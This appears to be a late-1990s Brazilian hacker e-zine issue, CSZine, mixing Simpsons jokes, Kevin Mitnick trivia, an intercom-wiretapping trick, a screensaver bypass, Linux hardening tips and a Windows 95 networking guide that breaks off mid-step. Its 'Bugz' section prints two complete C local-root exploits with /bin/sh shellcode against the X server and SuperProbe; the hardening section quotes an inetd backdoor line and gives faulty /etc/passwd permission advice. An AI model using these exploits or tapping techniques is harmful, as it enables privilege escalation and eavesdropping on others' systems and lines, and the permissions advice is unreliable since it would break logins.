                    zZZZZZZZZZZZZZZZZZZZZZZZZ
                                          zZ
                                         zZ
                                        zZ
                                       zZ
                                      zZ
                 CCCCCCCCCCCCCCCC    zZ SSSSSSSSSSSSSSSS
                CCCCCCCCCCCCCCCCC   zZ SSSSSSSSSSSSSSSSS
               CCCCCCCCCCCCCCCCCC  zZ SSSSSSSSSSSSSSSSSS
              CCCCCC        CCCCC zZ SSSSSS        SSSSS
             CCCCCCC             zZ SSSSSSS
            CCCCCCCC            zZ SSSSSSSSSSSSSSSSSSSSS
            CCCCCCCC           zZ  SSSSSSSSSSSSSSSSSSSSS
             CCCCCCC          zZ                SSSSSSS
              CCCCCC        CCCCC  SSSSS        SSSSSS
               CCCCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSSSS
                CCCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSSS
                 CCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSS
                         zZ
                        zZ
                       zZ
                      zZ
                     zZ
                    zZZZZZZZZZZZZZZZZZZZZZZZZine

                        by Cheat Struck

	Belo visual naum?

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

		UIN   da   revista : 16623675
		Canal  da  revista : #CSCHANNEL no irc.via-rs.com.br
		E-Mails da revista : cszine@hotmail.com
	                             cszine@xoommail.com
                Memoserv da revista: /msg memoserv send Struck <msg>
                                      (Soh no via-rs)
	        Page  da   revista : http://members.xoom.com/cszine

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=

	Introdução:

	Hehe! Altos papos no #hackers. To acabando de sair de lah, enquanto
tava vendo uns babacas(Posso me referir seguramente, pois eles se acham tão
bons que não taum nem ae pra esse zine) que começaram a brigar atrapalhando
os papos no canal.
	Assim.. Um manda o outro chupa, o outro diz que vai chupa as teta da
mãe do um, o um diz que o outro tah morto, o outro diz pro op bota ordem no
canal, o um mostra no canal o IP do um(como se jah fosse coisa tri hacker),
o outro chama o um de pato, o um diz que tah ligando pro provedor do outro,
o outro diz que tah usando a própria conta e não vai adiantar nada ligar pro
provedor, o um(que estava scaneando o host do outro as escondidas) ameaça o
outro com a frase manjada "TU NÃO ME CONHECE!" e mostra as portas detectadas
pelo scan, o outro diz "Entaum tenta me derrubar", o um diz que jah tá dentro
da MAKINA do outro, finalmente os dois são banidos do canal pelo op e o pes-
soal lamer que tava lah soh assistindo vai conta pros amigos que acabou de
presenciar uma briga entre hackers.
	Vão toma no cu! Os cara acabaram de instalar um Linux de kernel 2.0.0
e se logaram a inet. Usaram uns comandos que vem nos manuais do BitchX e ou-
tros que conseguiram nakela page hacker que ensina a hackear um provedor via
ftp. Após usarem todos os brinquedinhos, mostraram o resultado e deu, são os
maiores hackers.
	Atualmente os kra que frequentam esses canais taum mais pra lamahs
do que pra pelo menos Wannabes. E anda vem o palhaço do root e dah op preles
soh pq trocaram algumas palavrinhas e taum usando Linux(q entaum está muito
seguro, mesmo deixando o /etc/hosts.allow com all:all). A inet tah realmente
ficando uma merda. É por isso que nós nos vingamos do nosso jeito dessas
bixas adotadas e eles por sua vez avisam o paizinho que avisa o provedor que
diz que nos somos criminosos e deveriamos estar presos. Kra, isso me deixa
puto da vida. Ainda mais quando eles poe akelas pages cheias de bichices q
dizem que vão ensinar o outro a ser hacker em 5 lições. Ahhhhhhhh!
	...
	Bem.. Eu tinha que botar isso pra fora. Se vc leu isso, pode esquecer
se quizer que e não falei nada sobre a revista. Pois nem precisa. Vcs sabem.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Indice:

Seção:	Materia:		Assunto:		Autor:		Nota:

1.	FuNny			Piadas dos Simpsons	Cheat Struck	10,0
2.	Kevin Mitnick		Curiosidades		Cheat Struck	9,5
3.	Phreaking		Escutas via interfone	Cheat Struck	10,0
4.	Bugz			Bugz para Linux		Simon Phoenix	10,0
5.	Hacking p/ iniciantes	Protegendo seu sistema	Cheat Struck	9,5
6.	Redes			Redes Microsoft 	Cheat Struck	9,0
7.      Crackerz                Lista de hexas p4       Cheat Struck    9,0
8.      Invasao de privacidade  Kits de hackeagem       Pangéia LTDA.   10,0
9.      Hack, the Art           More tips               Cheat Struck    10,0
10.     ¡¡¡¡BoNuS!!!!           Boletim de segurança    Pangéia LTDA.   10,0

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  1. FuNnY  $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Melhores piadas dos Simpsons

(Naquele episódio do boliche)

<Moe> Cara.. Agente tenta ser gentil com as pessoas, nos controlamos para nao
esmurra-las na cara, e pra que? Pra elas nos tratar como lixo? Eu sou melhor
do que lixo. Quer dizer, a maioria dele, não aquele lixo que se compra em
lojas, aqueles tróço cheio de nutrientes. Eu não posso competir com esse tipo
de coisa.

(No mesmo episódio)

<Bart> Mãe.. a minha atiradeira não cabe nesses bolsos.. eu to parecendo um
frutinha.. esses uniformes sao um saco!
<Marge> Bart! Onde aprende essas palavras??
<Homer falando no telefone> É moe, aquele time de ontem foi um saco! Encheram
o saco de todo mundo! Jah ví times encherem sacos, mas um saco como aquele!
Eu nunca ví um saco igual!
<Marge> Homer! Veja como fala!
<Homer> Desculpa moe, tenho que desligar! Meus filhos estao aqui!
<Lisa> Jah reparou é?
<Homer> Porque estão usando essas roupas??
<Bart> Fomos obrigados
<Homer> Foram obrigados!! Conversa de perdedor! Devem agir mais como eu e meu
time! Os futuros campeoes do mundo!! Nada pode nos parar agora!
<Sr. Burns> Parem tudo! Não me lembro de ter feito nenhum cheque para boli-
che!!
<Smithers> Senhor, esse é o cheque da sua lavagem.
<Sr. Burns> Ah sim!! Isso é muito importante.
<Smithers> É, lembra da vez que não o fez?
<Sr. Burns> Sim, foi muito desagradavel. Pra todos os envolvidos. Bem.. vol-
tando aos cheques.. Parem tudo! Não me lembro de ter feito nenhum cheque para
boliche!!
<Smithers> Hm.. O memorando diz: "Para meu amigo fresquinho da silva".
<Sr. Burns> Ah sim! Aquele ganancioso globulo feito de quimicas.
<Smithers> Deve ter sido mais umas da suas alucinações feitas pelo eter. Vou
ver um ficha no pessoal para ver quem pode ter feito tamanha personificação.
.. Ou foi o Chester Forstam Maier .. Ou o Homer Simpson.

(Episódio em que homer vê um ETE)

<Homer> Ahhhh! Hoje é sabado! Eu vou para o parque!
<Lenny> Mas Homer.. Ainda é demanhã!
<Homer> Não tem problema! Eu vou fazer uma coisa que eu vi num filme onde
um onibus tinha que ficar fazendo voltas na cidade acima de 80Km/h e se dimi-
nuisse ele explodiria. Eu acho que se chamava: "O onibus que não podia parar"

(no mesmo episódio)

<Wilie> É um ETE!! Matem ele! Matem ele!
<Lisa> Não esperem! Vejam que é seu verdadeiro ETE!
<Wilie> É um Monstro!! Matem ele! Matem ele!
<Smithers> Não esperem!! Não é um monstro! É o senhor Burns.
<Wilie> Ah! É o senhor Burns. Matem ele! Matem ele!

(no mesmo episódio)

<Homer> Aí eu disse: "Chocolatisa! Azuis ou vermelhos!" mas no final ficou
todo mundo com a mesma cor.

(no episódio em que os pais do Milhouse se separam)

<Marge> Homer, Você está pronto?
<Homer só de cueca> Só falta calsar os sapatos.
<Marge> Homer, a unica coisa que eu lhe pedi foi para que ficase pronto.
Ding! Dong!
<Marge> Agora é tarde! Bart vá atender os convidados e pegue os casacos deles
<Bart> Mãe, o reverendo Lovey Joy não venho de casaco. Deixo ele entrar?

(No mesmo episódio)

<Reverendo Lovey Joy> Marge, você aceita Homer Simpson na saude e na doença,
na riquesa e na pobresa, pobresa está sublinhado..

(Sei lah qual episódio)

<Homer> Vc está vivendo no passado! Pare de viver no passado, Marge! Vc quer
a verdade? Vc quer a verdade? Vc quer a verdade? Não aguentaria a verdade!!
Porque quando você olhar pra traz e procurar o ombro de quem era o seu melhor
amigo, Não Encontrará!! Não Marge! Isso é Chainatal!

-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  2. Kevin Mitnick  $$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Curiosidades

	Alguns administradores dos EUA fundaram o movimento Já BASTA! Que é
contra todos os hackers que modificam sites colocando pedidos da liberdade
de Kevin Mitnick. Estamos deixando os caras loucos.

	Kevin Mitnick foi o hacker a ficar mais tempo preso. Já completou 4
anos desde 1994 quando foi julgado por fraude com computador e outras coisas.

	A pouco também foi fundada a causa Kevin Poulsen, que exigia a a con-
dicional faz um ano, com a condição de não tocar em nada relacionado a um
computador. Porem esse movimento não foi muito popular.

	A Yahoo, o catalogo de sites mais visitado, jah foi atakada por
hackers que durante 15 minutos ameaçavam lança um vírus para seus visitantes.
Eles exigiam a libertação de Mitnick em troca da vacina. Porém não foi detec-
tado nenhum vírus e a mensagem só podia ser vista para usuarios que usavam o
browser Lynx.

	Há relatos de que hackers famosos, como Kevin Mitnick, já praticavam
o phreaking antes de se casarem com os computadores. O samurai que o pegou,
Tsutomo Shimomura, foi praticamente quem fez o primeiro relato mais completo
sobre o phreaking de telefones celulares. Alias, Kevin só foi pego por ele
porque usava um celular clonado para acessar ilegalmente uma serie de compu-
tadores.

	Existem algumas pessoas que dizem que Mitnick chegou a invadir o
sistema da AT&T, mas isso são só histórias que envolvem Mitnick.

	Mitnick usava o nick de CONDOR em homenagem ao seu filme favorito.

	Contra-Ataque ( Titulo original: "Take Down") é um livro escrito por
John Markoff (jornalista) e Tsutomu Shimomura (especialista em seguranca de
computadores) que descreve como foi a captura do hacker Kevin Mitnick. Esta é
uma historia um tanto badalada, mas neste livro vc pode "ouvir" a versao de
Tsutomu. Kevin tem um livro contando a sua versao tambem mas parece que nao
saiu no Brasil.

	O OKI900 foi um dos principais motivos que levaram Mitnick a ser
preso. O aparelho é responsavel pela re-gravação dos celulares Epron. Kevin
invadiu o sistema de Shimomura a procura do código fonte desse programa e tb
informações sobre o aparelho. Após pegar as informaçòes do computador do
japa, Kevin poderia ficar indetectavel em qquer sistema telefonico.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  3. Phreaking  $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Escuta via interfone.

	Essa é nova. Eu acho que sou o primeiro a anunciar isso, pelo menos
no Brasil. Vá lah pra sua cozinha e de uma olhada no seu interfone. Eu nao
sei qual é o modelo do meu, nem se isso ira funcionar em todos. Aqui em casa
pelo menos funcionou.
	Repare que 2 fios saem do interfone.
	Agora pegue uma extenção e ligue os fios da extenção nos fios do
interfone. Eu não me lembro bem qual fio deve ser ligado em qual. Teste dos
dois modos.
	Agora atenda o telefone e PLIM! Se você quizer ligar pelo interfone
agora, use a tecnica de ligação sem teclas. Lembra né? Para discar 1 de um
toquezinho no botão onde vc encaixa o interfone, Para discar 2 de dois toque-
zinhos alí, Para 3, tres, e assim vai.
	No interfone o botão onde vc encaixa o telefone é o mesmo do qual vc
aperta para abrir a porta pro loko lah em baixo.
	Aqui vai um desenho de onde encaixar os fios:

                                    aparelho             fone
                                     ______              ____
                                    |   ___|            |    \
   Extenção      fios do interfone  |  |                |__   |
===============+====================|  |                   |  |
===============+====================|  |__               __|  |
                                    |  |__|_            |     |
                                    |_______|===========|____/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=

	Box em fase de teste

	Não é lah uma box. E tb não irá fazer nada muito importante. Mas tal-
véz outras boxes se gerem após essa. Pra falar a verdade, essa box ainda nem
saiu do papel. Eu nem experimentei pra ver se funciona pois se o fizesse a
minha mãe iria perceber o fio do interfone descapado ou com fita isolante.
	Aqui vai o rascunho que eu fiz no papel da box:

               _____                                  ________
              |     |                                |__-__-__|
==============|     |=================================/      \
              |_____|    fio que iria para o fone    /________\
             interfone                                telefone
             sem o fone

	O que essa box faria seria mandar pulsos para o aparelho do interfone
indicando que a porta deveria destrancar. Ae a porta iria destrancar em pe-
quenos pulsos, o que talvéz em uma visão geral não serviria pra nada. Mas com
tanta box ae que não serve pra bosta nenhuma a não ser pra conhecimento, o q
custa adicionar mais uma na lista.
	Se você testou essa box e não funcionou: Mail-me. Se vc nem testou
pq sabe o motivo dela não funcionar: Mail-me too. Se vc testou e funcionou:
Mail-me. E por fim, se você criou uma variação dessa box: Mail-me.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$         $$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  4. Bugz  $$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$         $$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Bug no Autorun

	É um bug simples do Windows(pq eu insisto em tocar nessa tecla?).
	Ele serve para livrar a tua barra nas horas em que o sistema parar
esperando por uma senha. Tipo nos screemsavers(protetores de tela).
	Assim que surgir o pedido de senha, coloque um CD com autorun(sabe,
aqueles que rodam automatico). O menu do CD surgirá, ae é só sair e vc não
precisará mais colocar password nenhum.
	O patch desse bug é algo muito simples e qualquer LAMAH descubrirá
sózinho. Desative o Autorun.
	Como fazer isso?? Putz. Não caberia a mim entrar em detalhes, ainda
mais pq vcs nem devem se interesar muito por isso, mas vou explicar:
	Abra o painel de controle.
	Clique no ícone Sistema.
	Clique em Gerenciador de Dispositivos.
	Abra o drive CDROM.
	Clique no drive do seu CDROM e clique em Propriedades.
	Clique em configurações.
	Por fim, desabilite a opção Auto-run ou Notificação de Auto-inserção.
	De OK em tudo, reinicie e pronto.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Bugz do Linux (por Simon Phoenix)

«»«»«»«»«»«»«»«»«»«»«»«»
* Versão : Redhat
* Descrição : Acesso ao disco flexivel
* Exploit :
cat /dev/fd0H1440

«»«»«»«»«»«»«»«»«»«»«»«»
* Versão : Redhat 4.1
* Descrição : Acesso de root
* Exploit :
------------------------------Corte Aki--(X.c)-------------------------------
#define OFFSET 2
#include <string.h>
#include <unistd.h>
#include <errno.h>
#define LENCODE ( sizeof( Code ) )
char Code[] =
    "\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0"
    "\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41"
    "\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd"
    "\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
    "\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh";
char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1;
char *args[] = { "X", "-nolock", Display, NULL };

main() {
  dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 );
  __asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000));
  memcpy( ptr + 4, ptr, 0x3fc );
  memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE );
  memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE );
  execve( "/usr/X11R6/bin/X", args, args + 3 );
  perror( "execve" );
}

-----------------------------------------------------------------------------

«»«»«»«»«»«»«»«»«»«»«»«»
* Versão : 4.x
* Descrição : Get passwd
* Exploit :
----------------------------Corte Aki--(super.c)-----------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd"
"\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40"
"\x31\xdb\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
  asm("movl %esp,%eax"); }
#define bufsize 8192
#define alignment 0
char buffer[bufsize];

main() {
  int i;
  for (i = 0; i < bufsize / 2; i += 4)
    *(char **)&buffer[i] = get_sp() - 2048;
  memset(&buffer[bufsize / 2], 0x90, bufsize / 2);
  strcpy(&buffer[bufsize - 256], shellcode);
  setenv("SHELLCODE", buffer, 1);
  memset(buffer, 'x', 72);
  *(char **)&buffer[72] = get_sp() - 6144 - alignment;
  buffer[76] = 0;
  execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL);
  printf("%s", buffer);
}

-----------------------------------------------------------------------------

«»«»«»«»«»«»«»«»«»«»«»«»
* Versão : Redhat 5.x
* Descrição : Permisões
* Exploit :
/bin/linuxconf

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$
$$$$$$$                          $$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$
$$$$$$  5. Hacking p/ iniciantes  $#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$
$$$$$$$                          $$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Protegendo seu sistema dos iguais a você.

	Eu ja falei muito sobre hacking, truques, bugz, e outras coisas. Mas
o que adianta saber um bocado sobre como tirar proveito do sistema dos outros
se vc não sabe como deixar que os outros não tirem proveito do seu sistema.
	Tipo os karas da MOS. Que se dedicaram tanto em hackear e no final
foram hackeados. Eu considero o MOS um grupo serio e o fato deles terem sido
hackeados não foi por causa de um erro deles e sim dos administradores da
XOOM.
	Aqui eu irei falar sobre como proteger o seu sistema pessoal, come-
çando do basico.

*** Com que permissão eu devo deixar o /etc/passwd ??? ***

	Um kra jah me fez essa pergunta. A permissão mais adequada seria rwx
para o root, --- para usuarios do grupo e outras pessoas.
	Ae ele me disse que quando coloca o /etc/passwd sem permisão de read
para outros usuarios, quando se loga como um usuario normal, aparece algo
tipo "You is Nobody" ou algo assim quando vc digita whoame.
	Isso acontece apenas quando o sistema está sem root. Ae o usuario
normal, como não tem acesso ao /etc/passwd, não tem como a shell descobrir
seu UID e GID(que estão no /etc/passwd) Por isso ele não te reconhece.
	A premissão correta para o /etc/passwd é -rwx------.
	É melhor vc deixar todos os arquivos do diretório /etc com essa per-
missão. Principalmente o passwd, o group e o hosts

*** Verificando se existem backdoors no seu Sistema ***

	A primeira coisa que vc deve fazer como root, sempre que se loga ao
seu sistema é digitar: cat /etc/passwd | grep :0:
	Isso mostrará se algum hacker entrou no sistema e colocou uma nova
conta root. Após digitar esse comando, a unica linha que deverá aparecer é a
correspondente da sua conta.
	Depois digite: cat /etc/inetd.conf | grep -i
	Se aparecer algo tipo:
Portashell	stream	tcp	nowait	root	/bin/sh		sh -i
	É backdoor na certa. As vezes os hackers, um pouco mais experientes
trocam o nome da shell sh para qquer coisa. Se conter a opçào -i, disconfie e
verifique o arquivo, para ver se não é nenhuma backdoor disfarçada.
	Também verifique os arquivos /etc/hosts.allow e /etc/hosts.denny. Se
no hosts.allow conter a linha all:all, retirea imediatamente, pois isso sig-
nifica que qquer paiaço pode acessar o seu sistema. Essa linha deve estar no
hosts.denny.
	A backdoor possivelmente mais dificíl de se encontrar é a shell com
a opção de superuser(+s) ativa. Acessando ela, o usuario normal tera acesso
de root e vc talvéz nem disconfie, pois ele está acessando uma shell como
qquer outro usuario. Se o kra se esqueceu de killar o ps onde ele ativa a
shell, vc pode ser capaz de descobrila facilmente digitando ps seguido da
opção -ax. MAs ae vc terá que ter paciencia.

*** Verificando a existencia de bugz no seu sistema ***

	É pra isso que a seção BUGZ tah ae. Verifique se arquivos tipo
/usr/X11R6/bin/SuperProbe e /usr/X11R6/bin/XF86* estão com a opção -s
(super user) ativada. Se estiver digite: chmod u-s /usr/X11R6/bin/XF86*.
	Esses dois bugz foram descritos na seção BUGZ por Simon Phoenix. Como
o trabalho dele é só descrever o exploit, então eu contratakei com o patch.
	Você deve se atualizar seu kernel sempre que sair uma versão mais re-
cente. Porém fique ligado nos bugz que eles levam junto. Para ficar sempre
aualizado diante os bugz tanto de UNIX, Windows e programas especificos, vi-
site o site http://www.rootshell.com . Lah vc encontrará, atualizadamente,
listas de Bugz e Exploits.

	Eu não vou comentar muito sobre segurança, pois não teria as minimas
chances diante das zines especializadas nisso como a RWX e POLICY. Recomendo
a lida das edições de ambas, tanto para administradores quanto para hackers.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Perguntas que vc sempre teve medo de fazer.

	Enviem emails com suas duvidas.

¿ Porque a maioria dos Exploits que prestam estão em C ?
	Primeiro porque C é a linguagem mais usada por usuarios de UNIX. tan-
to por seus compiladores jah virem juntos com o kernel. Depois, em C você po-
de fazer muito mais coisa do que apenas a linguagem basica de scripts para
UNIX, permitindo a criação de buffers que serão extremamentes importantes na
hora do Exploited.

	Essa semana, não recebi muitos emails de duvidas. Qquer coisa é soh
mandar que a sua privacidade será respeitada. Particulamente, eu tb acho um
conforto a privacidade na inet.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  6. Redes  $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

	Ehhhh.. Seção nova na zine. Talvéz ela permaneça, talvéz não. Tudo
depende dos editores darem as caras.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Redes Microsoft

	O objetivo deste texto é mostrar os passos básicos para a configu-
raçào de uma rede ponto-a-ponto(ppp), usando como software apenas os recursos
de redes incluídos no Windows 95.
	Neste projeto será criada uma estrutura composta por 3 micros.
	Um sistema desse tipo permite que cada computador seja usado, ao
mesmo tempo, como estação de trabalho e como servidor. Ou seja, o micro A
pode ser utilizado pelo seu usuário e ter a impressora que está ligada dire-
tamente a ele compartilhada pelos demais componentes da rede.
	Também é possivel especificar que uma de suas pastas(dirs) ou um
disco seja acessado por outros usuários.
	O ambiente dessa rede é descrito a seguir.

Micro 1 - É um 486 DX2 de 66 MHz com uma impressora conectada. Tem um disco
          rígido e uma unidade de CD-ROM que será compartilhada. Seu nome no
          sistema será DX266.
Micro 2 - Maquina 486 DX4 de 100 MHz com disco rígido, que será compartilhado
          O seu nome será 486DX100.
Micro 3 - Equipamento 486 SLC de 50 MHz. Essa máquina não terá nenhum recurso
          compartilhado. Seu nome será 486SLC50.

	Os passos básicos para configurar a rede ponto-a-ponto são os
seguintes:

1. Instalação fisica da rede.
2. Configuração do Software.
3. Identificação dos micros.
4. Definição de pastas e impressoaras compartilhadas.
5. Acesso aos recursos da rede.

	A instalação fisica de uma rede ponto-a-ponto não representa um bicho
de sete cabeças.
	Existem no mercado diversos kits de rede destinados a pequenos usuá-
rios que facilitam essa tarefa. Esses kits incluem placas, cabos, conectores,
e guias de instalação rápida.
	Durante a instalação do Windows 95, habilita-se automaticamente a
parte do sistema que permite ao micro trabalhar numa rede ponto-a-ponto como
clientes para redes microsoft. Para verificar se estes módulos foram realmen-
te instalados, abra o Painel de controle e clique no ícone Redes. A guia
Configuração mostra softwares presentes na máquina. O cliente para redes
microsoft é o responsavel pela operação da rede ponto-a-ponto do Windows 95.
Se ele estiver listado, pressione o botão OK. Caso contrario, pressione o
botão Adicionar para fazer sua instalação.
	O Próximo passo é fazer com que o micro seja renomeado pela rede.
Para isso é necessario dar um nome ao computador e outro ao grupo de trabalho
a que ele pertence. Essas informações são solicitadas durante a instalação do
Windows 95 mesmo que o usuário não esteja ligado em rede.

	Identificação:
	Para especificar os nomes do computador e do grupo de trabalho, per-
corra o seguinte roteiro:
1. Ative o Painel de Controle, clique no ícone Rede e, na caixa de diálogo
que se abre, escolha a guia Identificação.
2. Digite o nome do computador e do grupode trabalho. Não pode existir outro
micro na rede com o mesmo nome.
	O grupo de trabalho pode ser entendido como o departamento ao qual
pertence o micro. Pode-se ter uma rede com diversos micros ligados, mas divi-
didos em grupos. Neste exemplo, todos pertencerão a um grupo chamado ADS de
Analistas de Sistemas.
	Acaixa de diálogo oferece ainda a opção de registrar uma descrição
para o seu micro, que será visível para outros usuários quando consultarem
uma lista de computadores da rede. Como nossa rede hipotéticaé composta por 3
micros, essa caixa de dialogo deve ser preenchida em cada uma das maquinas.
Observe que o nome do computador é diferente em cada ponto(DX266, 486DX100 e
486SLC50) e o nome do grupo de trabalho é o mesmo(ADS).
	O próximo passo consiste em determinar quais periféricos serão com-
partilhados em cada micro. Uma maquina pode compartilhar todos os seus peri-
féricos, alguns deles ou simplesmente nenhum. Nesse último caso, ela funciona
apenas como uma estação de trabalho que acessa dados em outro local da rede.
	Para permitir compartilhamento de arquivo e impressora em seu compu-
tador:
1. Ative o painel de controle e clique no ícone Rede, a fim de exibir a caixa
